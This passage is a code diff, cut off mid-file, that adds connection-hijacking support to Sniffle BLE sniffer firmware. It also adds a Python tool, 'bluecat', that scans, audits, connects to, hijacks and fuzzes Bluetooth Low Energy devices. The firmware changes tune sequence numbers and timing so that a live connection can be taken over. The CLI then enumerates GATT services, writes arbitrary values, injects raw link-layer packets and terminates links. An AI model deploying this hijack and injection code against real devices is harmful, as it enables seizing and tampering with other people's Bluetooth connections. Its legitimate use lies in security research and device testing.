             g_pkt_dir = 1;
 
             uint32_t curHopTime = nextHopTime - rconf.hopIntervalTicks + AO_TARG;
+            int32_t hj_margin = (int32_t)(curHopTime - RF_getCurrentTime());
 
             if (rconf.winOffsetCertain)
             {
@@ -509,6 +515,20 @@ static void radioTaskFunction(UArg arg0, UArg arg1)
 
                 if (WinOffset > MaxOffset)
                     dprintf("Central failed to measure WinOffset");
+            }
+
+            // Hijack telemetry: emitted BEFORE the cancellation check so it fires
+            // even when the peripheral terminates mid-event (which sets snifferState
+            // away from CENTRAL and would otherwise skip this via the continue below).
+            // st==0 means the peripheral answered (link is up); margin is how far
+            // ahead of "now" the event anchor was scheduled (radio ticks, 0.25us
+            // each, sane ~= AO_TARG); ch is the data channel, sn the SN we sent.
+            if (hijack_report)
+            {
+                hijack_report--;
+                dprintf("HJ ev=%lu ch=%u margin=%ld st=%d ns=%lu sn=%u",
+                        (unsigned long)connEventCount, chan, (long)hj_margin,
+                        status, (unsigned long)numSent, hijack_next_tx_sn);
             }
 
             if (snifferState != CENTRAL)
@@ -929,6 +949,13 @@ static void reactToDataPDU(const BLE_Frame *frame, bool transmit)
     if (snifferState == DATA)
         g_pkt_dir ^= 1;
 
+    // After the XOR: g_pkt_dir==0 means we just received a P->C packet.
+    // Its NESN (bit 2) is the SN the peripheral expects from the next central
+    // packet. Save it so enterCentralFromData() can start with the correct
+    // nextTxSn instead of always using 0 (which deadlocks in ~50% of hijacks).
+    if (snifferState == DATA && g_pkt_dir == 0 && frame->length >= 2)
+        hijack_next_tx_sn = (frame->pData[0] >> 2) & 1;
+
     // data channel PDUs should at least have a 2 byte header
     if (frame->length < 2)
         return;
@@ -1067,6 +1094,9 @@ static void reactToDataPDU(const BLE_Frame *frame, bool transmit)
         break;
     case 0x02: // LL_TERMINATE_IND
         if (datLen != 2) break;
+        if (hijack_active)
+            dprintf("HJ END: TERMINATE dir=%u err=0x%02x ev=%lu",
+                    g_pkt_dir, frame->pData[3], (unsigned long)connEventCount);
         handleConnFinished();
         break;
     case 0x05: // LL_START_ENC_REQ
@@ -1297,6 +1327,7 @@ static void handleConnReq(PHY_Mode phy, uint32_t connTime, uint8_t *llData,
 
 static void handleConnFinished()
 {
+    hijack_active = false;
     stateTransition(sniffDoneState);
     accessAddress = BLE_ADV_AA;
     AuxAdvScheduler_reset();
@@ -1442,7 +1473,22 @@ void initiateConn(bool isRandom, void *_peerAddr, void *llData)
  */
 void enterCentralFromData(void)
 {
+    /* Force winOffsetCertain so CENTRAL state uses precise TX timing
+     * rather than sweep mode. nextHopTime is accurate from DATA state
+     * tracking even without instahop, so this is safe. */
+    rconf.winOffsetCertain = true;
+    
+    /* When tracking the connection in DATA, nextHopTime aligns with the exact 
+     * start of the reception window. But CENTRAL state assumes it's sending, 
+     * so it waits an extra AO_TARG before listening for the peripheral. 
+     * We must subtract AO_TARG here so our injected CENTRAL packets 
+     * are transmitted perfectly on time instead of arriving late. */
+    nextHopTime -= AO_TARG;
+
     RadioWrapper_resetSeqStat();
+    RadioWrapper_setNextTxSn(hijack_next_tx_sn);
+    hijack_report = 8; // telemetry: trace the first few central events post-hijack
+    hijack_active = true;
     stateTransition(CENTRAL);
     RadioWrapper_stop();
     TXQueue_init();

--- a/fw/RadioTask.h
+++ b/fw/RadioTask.h
@@ -47,6 +47,13 @@ void setAddr(bool isRandom, void *addr);
 /* Enter initiating state */
 void initiateConn(bool isRandom, void *peerAddr, void *llData);
 
+/* Hijack: transition from DATA to CENTRAL (mode 0) */
+void enterCentralFromData(void);
+
+/* Hijack: enter CENTRAL with explicit connection parameters (mode 1) */
+void enterCentralDirect(PHY_Mode phy, bool csa2, uint8_t *llData,
+        uint32_t connEvent, uint32_t anchorTicks);
+
 /* Enter legacy advertising state */
 void advertise(ADV_Mode mode, void *advData, uint8_t advLen,
         void *scanRspData, uint8_t scanRspLen);

--- a/fw/RadioWrapper.c
+++ b/fw/RadioWrapper.c
@@ -618,6 +618,12 @@ void RadioWrapper_resetSeqStat()
     RF_cmdBle5Slave.pParams->seqStat.bLlCtrlAckPending = 0;
 }
 
+void RadioWrapper_setNextTxSn(uint8_t nextTxSn)
+{
+    RF_cmdBle5Master.pParams->seqStat.nextTxSn = nextTxSn & 1;
+    RF_cmdBle5Slave.pParams->seqStat.nextTxSn = nextTxSn & 1;
+}
+
 /* Initiate a connection to the specified peer address
  *
  * Arguments:

--- a/fw/RadioWrapper.h
+++ b/fw/RadioWrapper.h
@@ -95,6 +95,9 @@ int RadioWrapper_peripheral(PHY_Mode phy, uint32_t chan, uint32_t accessAddr,
 // Reset sequence numbers for central/peripheral modes
 void RadioWrapper_resetSeqStat(void);
 
+// Override nextTxSn after resetSeqStat to match what the peripheral expects
+void RadioWrapper_setNextTxSn(uint8_t nextTxSn);
+
 // Initiate connection with peer
 int RadioWrapper_initiate(PHY_Mode phy, uint32_t chan, uint32_t timeout, bool forever,
     RadioWrapper_Callback callback, const uint16_t *initAddr, bool initRandom,

--- a/fw/makefile
+++ b/fw/makefile
@@ -86,6 +86,14 @@ ifneq ($(filter $(PLATFORM), $(1M_BAUD_PLATFORMS)),)
     CFLAGS += -DUART_1M_BAUD
 endif
 
+# CatSniffer V3 wires the RX-activity LED to DIO_24, which the stock
+# LP_CC1352P7_1 board definition (shared with the plain CC1352P7 LaunchPad)
+# does not map. Flag only the CatSniffer platform so PacketTask.c drives that
+# pin directly; every other board keeps the board apps/LED instance.
+ifeq ($(PLATFORM), CC1352P74_1M)
+    CFLAGS += -DSNIFFLE_CATSNIFFER_LED_DIO=24
+endif
+
 ifeq ($(HARD_FLOAT),2)
     CFLAGS += -mfloat-abi=hard -mfpu=fpv5-sp-d16 -mcpu=cortex-m33
     LFLAGS += -mfloat-abi=hard -mfpu=fpv5-sp-d16 -mcpu=cortex-m33

--- a/python_cli/bluecat.py
+++ b/python_cli/bluecat.py
@@ -1,0 +1,744 @@
+#!/usr/bin/env python3
+
+# bluecat — BLE recon/hijack/GATT tool
+# Uses Sniffle hardware (CatSniffer) to scan, audit, connect to, hijack, or
+# fuzz a BLE peripheral, enumerate GATT services, and drop into an interactive
+# REPL.
+#
+# Subcommands:
+#   bluecat scan              — passive/active BLE scan
+#   bluecat audit  [MAC]      — vulnerability assessment
+#   bluecat connect MAC       — connect as central → GATT enum → REPL
+#   bluecat hijack [MAC]      — take over a live connection → enum → REPL
+#   bluecat fuzz   [MAC]      — multi-layer BLE fuzzer
+
+import argparse, sys, signal, json, binascii, logging, os, traceback
+from time import sleep
+from binascii import unhexlify
+from sniffle.sniffle_hw import (SniffleHW, find_xds110_serport,
+                                find_sonoff_serport, find_catsniffer_v3_serport)
+from sniffle.pcap import PcapBleWriter
+from sniffle import att, gatt
+from sniffle import session as ses
+from sniffle import recon, fuzzer
+from sniffle import audit as aud
+from sniffle import sniff
+from sniffle.central_link import ATTError, LinkLost
+from sniffle.posture import Posture
+from sniffle.recon import Device
+
+
+def parse_mac(s):
+    return [int(x, 16) for x in reversed(s.split(":"))]
+
+
+def _hexbytes(tokens):
+    """Join hex tokens and strip spaces/colons, so a value can be pasted exactly
+    as it appears in the sniff/GATT output: 'w 0x000E 7e 07 05 03' or
+    '7e:07:05' both yield b'\\x7e\\x07\\x05...'. tokens is the list of words
+    after the handle."""
+    return unhexlify(''.join(tokens).replace(':', '').replace(' ', ''))
+
+
+def _quiet_logger():
+    """Logger at ERROR level so SniffleHW's per-packet 'Skipping decode due to
+    exception' warnings (benign — a stray/short packet that fails the adv
+    decoder) don't flood stderr with tracebacks. Real errors still show."""
+    lg = logging.getLogger("bluecat.hw")
+    lg.setLevel(logging.ERROR)
+    if not lg.handlers:
+        lg.addHandler(logging.StreamHandler(sys.stderr))
+    return lg
+
+
+def _resolve_port(serport):
+    """The port SniffleHW will actually use (mirrors its auto-detect order)."""
+    if serport:
+        return serport
+    return (find_xds110_serport() or find_sonoff_serport()
+            or find_catsniffer_v3_serport())
+
+
+def _is_catsniffer_port(serport):
+    """True if *serport* refers to an Electronic Cats CatSniffer."""
+    try:
+        from serial.tools.list_ports import comports
+        from os.path import realpath
+        target = realpath(serport)
+        for i in comports():
+            if realpath(i.device) == target:
+                return bool((i.product and "catsniffer" in i.product.lower())
+                            or (i.vid == 0x1209 and i.pid == 0xbabb))
+    except Exception:
+        pass
+    return False
+
+
+def open_hw(args):
+    """Open the sniffer with a read timeout (so we never block forever) and
+    reset any leftover DATA/CENTRAL state from a previous run, so every
+    invocation starts from a clean firmware state."""
+    baud = args.baudrate
+    if baud is None:
+        # Zero-flag operation: a CatSniffer runs its _1M firmware at 921600, so
+        # default to that when the target port is a CatSniffer. TI Launchpad /
+        # XDS110 keeps SniffleHW's 2M default. An explicit -b always overrides.
+        port = _resolve_port(args.serport)
+        if port and _is_catsniffer_port(port):
+            baud = 921600
+    try:
+        hw = SniffleHW(args.serport, baudrate=baud, timeout=2, logger=_quiet_logger())
+    except IOError as e:
+        print("[!] %s" % e, file=sys.stderr)
+        print("[!] Specify the port explicitly:  -s /dev/cu.usbmodem...   (yours is "
+              "likely /dev/cu.usbmodem11201)", file=sys.stderr)
+        print("[!] List ports with:  python3 -m serial.tools.list_ports -v", file=sys.stderr)
+        sys.exit(2)
+    hw.cmd_reset()      # leave any connection/central state a prior run left behind
+    sleep(0.5)          # let the firmware settle to STATIC before we reconfigure
+    return hw
+
+
+def do_enum(link, name, mac, posture):
+    cli = gatt.GattClient(link)
+    services = cli.discover_all(read_values=True)
+    color = sys.stdout.isatty()
+    print(gatt.render_gatt_tree(services, name=name, mac=mac,
+                                posture=posture.verdict(), color=color))
+    surface = gatt.render_attack_surface(services, color=color)
+    if surface:
+        print(surface)
+    return services
+
+
+def repl(link, name, mac, posture):
+    gcli = gatt.GattClient(link)
+    # Importing readline transparently upgrades input() below with line editing
+    # (left/right arrows), and up/down recall of commands entered this session.
+    try:
+        import readline  # noqa: F401
+    except ImportError:
+        pass
+    print("\nbluecat REPL — 'help' for commands.\n")
+    while link.alive:
+        while not link.notifications.empty():
+            h, v = link.notifications.get()
+            print("  notify 0x%04X: %s" % (h, v.hex(' ')))
+        try:
+            cmd = input("bluecat> ").strip()
+        except EOFError:
+            break
+        if not cmd:
+            continue
+        parts = cmd.split()
+        op = parts[0].lower()
+        try:
+            if op in ("quit", "q", "exit"):
+                break
+            elif op in ("help", "h", "?"):
+                print("enum|e | read|r <h> | write|w <h> <hex> | writereq|wr <h> <hex> | "
+                      "sub|s <h> | unsub|u <h> | raw <hex> | tx <llid> <hex> |\n"
+                      "kill|term [reason] | posture | info | quit\n"
+                      "  (hex may contain spaces/colons: w 0x000e 7e 07 05 03 ff 00 00 10 ef)")
+            elif op in ("enum", "e"):
+                do_enum(link, name, mac, posture)
+            elif op in ("read", "r"):
+                print("  ", gcli.read(int(parts[1], 0)).hex(' '))
+            elif op in ("write", "w", "writereq", "wr", "wreq"):
+                resp = op in ("writereq", "wr", "wreq")
+                gcli.write(int(parts[1], 0), _hexbytes(parts[2:]), response=resp)
+                print("  ok")
+            elif op in ("sub", "s"):
+                link.att_request(att.build_write_req(int(parts[1], 0), b'\x01\x00'))
+                print("  subscribed (wrote 0001 to CCCD 0x%04X)" % int(parts[1], 0))
+            elif op in ("unsub", "u"):
+                link.att_request(att.build_write_req(int(parts[1], 0), b'\x00\x00'))
+                print("  unsubscribed (wrote 0000 to CCCD 0x%04X)" % int(parts[1], 0))
+            elif op == "raw":
+                link.hw.cmd_transmit(2, att.l2cap_wrap(_hexbytes(parts[1:])))
+            elif op == "tx":
+                link.tx_raw_ll(int(parts[1], 0), _hexbytes(parts[2:]))
+            elif op in ("kill", "term", "terminate"):
+                # Default reason 0x13 = "Remote User Terminated Connection".
+                reason = int(parts[1], 0) if len(parts) > 1 else 0x13
+                print("  sending LL_TERMINATE_IND (reason 0x%02X); closing link..." % reason)
+                clean = link.terminate(reason)   # blocks until firmware -> STATIC, or forces a reset
+                print("  link closed by peer ack." if clean
+                      else "  peer didn't ack in time — forced firmware reset.")
+                print("  peer should re-advertise; reconnect:  bluecat connect %s" % mac)
+                # link.alive is now False, so the REPL loop exits cleanly below.
+            elif op == "posture":
+                print("  posture:", posture.verdict(), posture.tag())
+            elif op == "info":
+                print("  target %s (%s)  alive=%s" % (mac, name, link.alive))
+            else:
+                print("  unknown; 'help'")
+        except (ATTError, LinkLost, ValueError, IndexError, TimeoutError) as e:
+            print("  error:", e)
+    print("link closed.")
+
+
+# ---------------------------------------------------------------------------
+# scan subcommand
+# ---------------------------------------------------------------------------
+
+def cmd_scan(args):
+    hw = open_hw(args)
+    signal.signal(signal.SIGINT, lambda *a: (hw.cmd_reset(), sys.exit(0)))
+
+    print("[*] scanning ch %s for %.1fs..." %
+          ("37/38/39" if args.advchan is None else str(args.advchan), args.time),
+          file=sys.stderr)
+    devices = recon.scan(hw, advchan=args.advchan, duration=args.time)
+
+    hw.cmd_reset()
+
+    if args.json:
+        import dataclasses
+        out = json.dumps([dataclasses.asdict(d) for d in devices], indent=2)
+        if args.output:
+            with open(args.output, "w") as f:
+                f.write(out + "\n")
+            print("[+] wrote JSON to %s" % args.output, file=sys.stderr)
+        else:
+            print(out)
+    else:
+        use_color = (not args.no_color) and sys.stdout.isatty()
+        table = recon.render_scan_table(devices, color=use_color)
+        if args.output:
+            # Strip ANSI when writing to file
+            import re
+            plain = re.sub(r'\x1b\[[0-9;]*m', '', table)
+            with open(args.output, "w") as f:
+                f.write(plain + "\n")
+            print(table)
+            print("[+] wrote table to %s" % args.output, file=sys.stderr)
+        else:
+            print(table)
+
+
+# ---------------------------------------------------------------------------
+# audit subcommand
+# ---------------------------------------------------------------------------
+
+def cmd_audit(args):
+    hw = open_hw(args)
+    signal.signal(signal.SIGINT, lambda *a: (hw.cmd_reset(), sys.exit(0)))
+
+    use_color = (not args.no_color) and sys.stdout.isatty()
+
+    if args.mac:
+        # Single-target audit: build a synthetic Device from CLI args
+        addr_type = "Public" if getattr(args, "public", False) else "Random"
+        device = Device(mac=args.mac, addr_type=addr_type)
+        print("[*] auditing %s (%s) ..." % (args.mac, addr_type), file=sys.stderr)
+        findings = aud.audit_device(hw, device,
+                                    aggressive=getattr(args, "aggressive", False))
+        block = aud.render_audit(device, findings, color=use_color)
+        output_text = block + "\n"
+        results = [(device, findings)]
+    else:
+        # Audit-on-discovery: scan each channel and immediately audit newly
+        # discovered devices while their address is still fresh.  Connectable
+        # advertisers (incl. private RPA/NRPA, unless --skip-private) are
+        # connected to and GATT-enumerated; non-connectable beacons are reported
+        # as such without a wasted connection attempt.
+        ch_label = "37/38/39" if args.advchan is None else str(args.advchan)
+        include_private = not getattr(args, "skip_private", False)
+        priv_note = "" if include_private else " (skipping private addresses)"
+        print("[*] audit-on-discovery: scanning ch %s for %.1fs per channel%s..." %
+              (ch_label, args.time, priv_note), file=sys.stderr)
+
+        blocks = []
+
+        def _on_discover(d):
+            print("[~] %s (%s) %s — auditing..." %
+                  (d.mac, d.addr_type, d.name or ""), file=sys.stderr)
+
+        def _on_result(d, f):
+            block = aud.render_audit(d, f, color=use_color)
+            blocks.append(block)
+            print(block)
+
+        results = recon.scan_and_audit(
+            hw,
+            advchan=args.advchan,
+            duration=args.time,
+            aggressive=getattr(args, "aggressive", False),
+            include_private=include_private,
+            on_discover=_on_discover,
+            on_result=_on_result,
+        )
+
+        summary = aud.render_audit_summary(results, color=use_color)
+        print(summary)
+        output_text = "\n\n".join(blocks) + "\n" + summary + "\n"
+
+    if args.json:
+        import dataclasses
+        json_out = json.dumps(
+            [
+                {
+                    "device": dataclasses.asdict(dev),
+                    "findings": [
+                        {"severity": f.severity, "check": f.check,
+                         "title": f.title, "detail": f.detail}
+                        for f in finds
+                    ],
+                }
+                for dev, finds in results
+            ],
+            indent=2,
+        )
+        if args.output:
+            with open(args.output, "w") as fh:
+                fh.write(json_out + "\n")
+            print("[+] wrote JSON to %s" % args.output, file=sys.stderr)
+        else:
+            print(json_out)
+    else:
+        import re
+        if args.output:
+            plain = re.sub(r'\x1b\[[0-9;]*m', '', output_text)
+            with open(args.output, "w") as fh:
+                fh.write(plain)
+            print(output_text, end="")
+            print("[+] wrote audit to %s" % args.output, file=sys.stderr)
+        else:
+            print(output_text, end="")
+
+    hw.cmd_reset()
+
+
+# ---------------------------------------------------------------------------
+# Shared helper for connect/hijack (enum + REPL + pcap wiring)
+# ---------------------------------------------------------------------------
+
+def _connect_or_die(hw, mac_str, public, posture, timeout=8):
+    """Connect to mac_str, trying BOTH address types so --public isn't required
+    (the scan already knows public vs random, but a direct MAC might not). Returns
+    a live CentralLink, or prints a clean message and exits — never a traceback."""
+    macl = parse_mac(mac_str)
+    for is_random in (not public, public):   # the user's hint first, then the other
+        try:
+            return ses.connect_session(hw, macl, is_random=is_random,
+                                       posture=posture, timeout=timeout)
+        except (RuntimeError, LinkLost, TimeoutError):
+            try:
+                hw.cmd_reset()
+                sleep(0.3)
+            except Exception:
+                pass
+    print("[!] Could not connect to %s — tried both public and random address types."
+          % mac_str, file=sys.stderr)
+    print("[!] Is it advertising and not already connected to a phone/app?",
+          file=sys.stderr)
+    sys.exit(1)
+
+
+def _access(hw, args, mode):
+    """mode is one of 'connect', 'hijack', 'follow'."""
+    posture = Posture()
+    pcap = PcapBleWriter(args.output) if args.output else None
+    advchan = getattr(args, "advchan", None) or 37
+
+    try:
+        if mode == "follow":
+            print("[*] follow mode: catching first connection on ch %d..." % advchan,
+                  file=sys.stderr)
+            link = ses.follow_session(hw, advchan=advchan, posture=posture)
+            name, mac = "?", "(caught)"
+        elif mode == "hijack":
+            print("[*] hijacking %s ..." % args.mac, file=sys.stderr)
+            link = ses.hijack_session(hw, parse_mac(args.mac), advchan=advchan,
+                                      posture=posture)
+            name, mac = "?", args.mac
+        else:  # connect — _connect_or_die handles its own clean exit on failure
+            print("[*] connecting to %s ..." % args.mac, file=sys.stderr)
+            link = _connect_or_die(hw, args.mac, args.public, posture)
+            posture.saw_plaintext_att = True
+            name, mac = "?", args.mac
+    except (RuntimeError, LinkLost, TimeoutError) as e:
+        print("[!] %s" % e, file=sys.stderr)
+        try:
+            hw.cmd_reset()
+        except Exception:
+            pass
+        sys.exit(1)
+
+    # Wire up pcap BEFORE do_enum so all GATT traffic is captured.
+    link.pcap_writer = pcap
+
+    print("[+] in CENTRAL — posture:", posture.verdict())
+
+    # Controller identity: LL_VERSION_IND carries the Bluetooth SIG Company
+    # Identifier of the peer's BLE controller (silicon/stack vendor — not always
+    # the product brand). This is the SIG company id even when the device
+    # advertises no Manufacturer Specific Data.
+    try:
+        ver = link.request_version(timeout=3.0)
+        if ver is not None:
+            print("[+] controller: %s" % ver)
+    except (LinkLost, RuntimeError):
+        pass
+
+    if not args.no_enum:
+        try:
+            do_enum(link, name, mac, posture)
+        except TimeoutError:
+            print("[!] reached CENTRAL but peer is not responding to ATT — "
+                  "is the target still connected to another device, or not actually connectable?")
+        except (ATTError, LinkLost) as e:
+            print("[!] enum incomplete:", e)
+
+    repl(link, name, mac, posture)
+
+    hw.cmd_reset()
+    # The OS reclaims the pcap fd at process exit (mirroring sniff_receiver.py).
+
+
+# ---------------------------------------------------------------------------
+# connect subcommand
+# ---------------------------------------------------------------------------
+
+def cmd_connect(args):
+    hw = open_hw(args)
+    signal.signal(signal.SIGINT, lambda *a: (hw.cmd_reset(), sys.exit(0)))
+    _access(hw, args, "connect")
+
+
+# ---------------------------------------------------------------------------
+# hijack subcommand
+# ---------------------------------------------------------------------------
+
+def cmd_hijack(args):
+    hw = open_hw(args)
+    signal.signal(signal.SIGINT, lambda *a: (hw.cmd_reset(), sys.exit(0)))
+    if args.mac:
+        _access(hw, args, "hijack")
+    else:
+        _access(hw, args, "follow")
+
+
+# ---------------------------------------------------------------------------
+# fuzz subcommand
+# ---------------------------------------------------------------------------
+
+def cmd_fuzz(args):
+    hw = open_hw(args)
+    posture = Posture()
+
+    logger = fuzzer.FuzzLogger(args.output)
+
+    def _cleanup():
+        logger.close()
+        try:
+            hw.cmd_reset()
+        except Exception:
+            pass
+
+    signal.signal(signal.SIGINT, lambda *a: (_cleanup(), sys.exit(0)))
+
+    # Establish session exactly like the access path
+    if args.hijack:
+        if not args.mac:
+            print("[!] --hijack requires a MAC positional argument", file=sys.stderr)
+            _cleanup()
+            sys.exit(1)
+        print("[*] hijacking connection to %s ..." % args.mac, file=sys.stderr)
+        link = ses.hijack_session(hw, parse_mac(args.mac),
+                                  advchan=args.advchan, posture=posture)
+        reconnect_fn = None
+        print("[!] note: crash-resume unavailable in hijack mode", file=sys.stderr)
+    elif args.mac:
+        print("[*] connecting to %s ..." % args.mac, file=sys.stderr)
+        link = _connect_or_die(hw, args.mac, args.public, posture)
+        posture.saw_plaintext_att = True
+        _mac_copy = args.mac
+        _public_copy = args.public
+
+        def reconnect_fn():
+            nl = _connect_or_die(hw, _mac_copy, _public_copy, Posture())
+            return nl, gatt.GattClient(nl)
+    else:
+        print("[*] follow mode: catching first connection on ch %d..." % args.advchan,
+              file=sys.stderr)
+        link = ses.follow_session(hw, advchan=args.advchan, posture=posture)
+        reconnect_fn = None
+        print("[!] note: crash-resume unavailable in follow mode", file=sys.stderr)
+
+    print("[+] in CENTRAL — posture:", posture.verdict(), file=sys.stderr)
+
+    gcli = gatt.GattClient(link)
+
+    # Build per-mode kwargs from real Fuzzer.run() signature:
+    #   values  : handle (int), seed (bytes)
+    #   sweep   : payload (bytes), start (int), end (int)
+    #   opcodes : (no extra kwargs)
+    #   ll      : (no extra kwargs)
+    seed = binascii.unhexlify(args.seed) if args.seed else b''
+
+    if args.mode == "values":
+        handle = args.handle if args.handle is not None else 0x0001
+        kw = {"handle": handle, "seed": seed}
+    elif args.mode == "sweep":
+        payload = seed if seed else b'\x00'
+        kw = {
+            "payload": payload,
+            "start": args.start,
+            "end": args.end,
+        }
+    elif args.mode in ("opcodes", "ll"):
+        kw = {}
+    else:
+        print("[!] unknown mode: %s" % args.mode, file=sys.stderr)
+        _cleanup()
+        sys.exit(1)
+
+    fz = fuzzer.Fuzzer(link, gcli, logger, reconnect=reconnect_fn)
+
+    try:
+        summary = fz.run(args.mode, **kw)
+    except KeyboardInterrupt:
+        summary = {"tested": logger.count, "crashes": len(logger.crashes),
+                   "anomalies": 0}
+    finally:
+        _cleanup()
+
+    print("\n[+] fuzz summary:", summary)
+    if args.output:
+        print("[+] log written to %s" % args.output)
+
+
+# ---------------------------------------------------------------------------
+# sniff subcommand
+# ---------------------------------------------------------------------------
+
+def cmd_sniff(args):
+    hw = open_hw(args)
+    signal.signal(signal.SIGINT, lambda *a: (hw.cmd_reset(), sys.exit(0)))
+
+    mac_str = args.mac
+    print("[*] following connection to %s on ch %d (Ctrl-C to stop)..." %
+          (mac_str, args.advchan))
+
+    pcap = PcapBleWriter(args.output) if args.output else None
+
+    try:
+        sniff.sniff_connection(
+            hw,
+            parse_mac(mac_str),
+            advchan=args.advchan,
+            duration=args.time,
+            on_op=lambda line: print(line),
+            pcap_writer=pcap,
+        )
+    except KeyboardInterrupt:
+        pass
+    finally:
+        hw.cmd_reset()
+
+
+# ---------------------------------------------------------------------------
+# Argument parsing
+# ---------------------------------------------------------------------------
+
+def _add_common(p):
+    """Add -s/--serport and -b/--baudrate to a subcommand parser."""
+    p.add_argument("-s", "--serport", default=None,
+                   help="CatSniffer serial port (auto-detected if omitted)")
+    p.add_argument("-b", "--baudrate", type=int, default=None,
+                   help="Serial port baud rate")
+
+
+def main():
+    top = argparse.ArgumentParser(
+        prog="bluecat",
+        description="bluecat — BLE recon/hijack/GATT tool (CatSniffer)",
+        epilog="Run 'bluecat <command> -h' for per-command help.",
+    )
+
+    subs = top.add_subparsers(dest="command", metavar="command")
+    subs.required = True   # no implicit default; no-subcommand prints help + exits 2
+
+    # ------------------------------------------------------------------ scan
+    sp_scan = subs.add_parser(
+        "scan",
+        help="Discover nearby BLE devices (passive scan)",
+        description="Passive BLE scan — lists all advertising devices seen on the "
+                    "selected channel(s) during the dwell window.",
+    )
+    _add_common(sp_scan)
+    sp_scan.add_argument("-c", "--advchan", type=int, default=None, choices=[37, 38, 39],
+                         metavar="{37,38,39}",
+                         help="Advertising channel to scan (default: sweep all of 37/38/39)")
+    sp_scan.add_argument("--time", type=float, default=5.0, metavar="SECONDS",
+                         help="Scan dwell per channel in seconds (default: 5.0)")
+    sp_scan.add_argument("--no-color", action="store_true",
+                         help="Disable ANSI color in table output")
+    sp_scan.add_argument("--json", action="store_true",
+                         help="Output as JSON instead of a table")
+    sp_scan.add_argument("-o", "--output", default=None, metavar="FILE",
+                         help="Write output to FILE (JSON or plain-text table)")
+
+    # ----------------------------------------------------------------- audit
+    sp_audit = subs.add_parser(
+        "audit",
+        help="Vulnerability-assess BLE devices (no MAC = audit-on-discovery sweep)",
+        description="Run a BLE vulnerability audit.  With no MAC, performs "
+                    "audit-on-discovery: every connectable advertiser found during "
+                    "the scan window is assessed as it appears.  With a MAC, "
+                    "audits that single device.",
+    )
+    _add_common(sp_audit)
+    sp_audit.add_argument("mac", nargs="?", default=None, metavar="MAC",
+                          help="Target MAC address (e.g. AA:BB:CC:DD:EE:FF); "
+                               "omit for audit-on-discovery sweep")
+    sp_audit.add_argument("--public", action="store_true",
+                          help="Treat MAC as a public address (default: random)")
+    sp_audit.add_argument("-c", "--advchan", type=int, default=None, choices=[37, 38, 39],
+                          metavar="{37,38,39}",
+                          help="Advertising channel to scan (default: sweep all of 37/38/39)")
+    sp_audit.add_argument("--time", type=float, default=5.0, metavar="SECONDS",
+                          help="Scan dwell per channel in seconds (default: 5.0)")
+    sp_audit.add_argument("--aggressive", action="store_true",
+                          help="Enable aggressive checks (reserved; accepted but unused in "
+                               "this release)")
+    sp_audit.add_argument("--skip-private", action="store_true",
+                          help="Skip RPA/NRPA (private/rotating) addresses — "
+                               "only Public and Static addresses are audited")
+    sp_audit.add_argument("--no-color", action="store_true",
+                          help="Disable ANSI color in output")
+    sp_audit.add_argument("--json", action="store_true",
+                          help="Output as JSON instead of formatted text")
+    sp_audit.add_argument("-o", "--output", default=None, metavar="FILE",
+                          help="Write output to FILE (JSON or plain-text audit report)")
+
+    # --------------------------------------------------------------- connect
+    sp_connect = subs.add_parser(
+        "connect",
+        help="Connect as central → GATT enumeration → interactive REPL",
+        description="Initiate an outbound BLE connection to MAC, enumerate GATT "
+                    "services, and drop into an interactive REPL.",
+    )
+    _add_common(sp_connect)
+    sp_connect.add_argument("mac", metavar="MAC",
+                            help="Target peripheral MAC address (e.g. AA:BB:CC:DD:EE:FF)")
+    sp_connect.add_argument("--public", action="store_true",
+                            help="MAC is a public address (default: random)")
+    sp_connect.add_argument("--no-enum", action="store_true",
+                            help="Skip initial GATT enumeration")
+    sp_connect.add_argument("-o", "--output", default=None, metavar="FILE.pcap",
+                            help="PCAP output file for captured traffic")
+
+    # --------------------------------------------------------------- hijack
+    sp_hijack = subs.add_parser(
+        "hijack",
+        help="Take over a live connection → GATT enum → REPL; no MAC = follow first seen",
+        description="Sniff then hijack an existing BLE connection.  With a MAC, "
+                    "waits for and hijacks a connection to that specific peripheral. "
+                    "Without a MAC, follows (takes over) the first connection seen "
+                    "on the advertising channel.",
+    )
+    _add_common(sp_hijack)
+    sp_hijack.add_argument("mac", nargs="?", default=None, metavar="MAC",
+                           help="Target peripheral MAC address; omit to follow the "
+                                "first connection seen")
+    sp_hijack.add_argument("--public", action="store_true",
+                           help="MAC is a public address (default: random)")
+    sp_hijack.add_argument("-c", "--advchan", type=int, default=37, choices=[37, 38, 39],
+                           metavar="{37,38,39}",
+                           help="Primary advertising channel (default: 37)")
+    sp_hijack.add_argument("--no-enum", action="store_true",
+                           help="Skip initial GATT enumeration")
+    sp_hijack.add_argument("-o", "--output", default=None, metavar="FILE.pcap",
+                           help="PCAP output file for captured traffic")
+
+    # ------------------------------------------------------------------ fuzz
+    sp_fuzz = subs.add_parser(
+        "fuzz",
+        help="Multi-layer BLE fuzzer (values/sweep/opcodes/ll)",
+        description="Fuzz a BLE peripheral over a connect/hijack/follow session. "
+                    "Choose a fuzzing mode with --mode.",
+    )
+    _add_common(sp_fuzz)
+    sp_fuzz.add_argument("mac", nargs="?", default=None, metavar="MAC",
+                         help="Target peripheral MAC address; omit for follow mode")
+    sp_fuzz.add_argument("--public", action="store_true",
+                         help="MAC is a public address (default: random)")
+    sp_fuzz.add_argument("--hijack", action="store_true",
+                         help="Sniff then hijack an existing connection to MAC")
+    sp_fuzz.add_argument("-c", "--advchan", type=int, default=37, choices=[37, 38, 39],
+                         metavar="{37,38,39}",
+                         help="Primary advertising channel (default: 37)")
+    sp_fuzz.add_argument("--mode", required=True,
+                         choices=["values", "sweep", "opcodes", "ll"],
+                         help="Fuzzing mode: values=characteristic value mutations, "
+                              "sweep=handle range sweep, opcodes=raw ATT opcodes, "
+                              "ll=LL control PDUs")
+    sp_fuzz.add_argument("--handle", type=lambda x: int(x, 0), default=None,
+                         metavar="H",
+                         help="ATT handle for 'values' mode (hex or decimal, default: 0x0001)")
+    sp_fuzz.add_argument("--seed", default=None, metavar="HEX",
+                         help="Hex seed for value mutations or sweep payload (e.g. deadbeef)")
+    sp_fuzz.add_argument("--start", type=lambda x: int(x, 0), default=0x0001,
+                         metavar="H",
+                         help="Start handle for 'sweep' mode (default: 0x0001)")
+    sp_fuzz.add_argument("--end", type=lambda x: int(x, 0), default=0x00FF,
+                         metavar="H",
+                         help="End handle for 'sweep' mode (default: 0x00FF)")
+    sp_fuzz.add_argument("-o", "--output", default=None, metavar="FILE.jsonl",
+                         help="JSONL log output path for fuzzing results")
+
+    # ----------------------------------------------------------------- sniff
+    sp_sniff = subs.add_parser(
+        "sniff",
+        help="Passively follow a live BLE connection and print ATT operations",
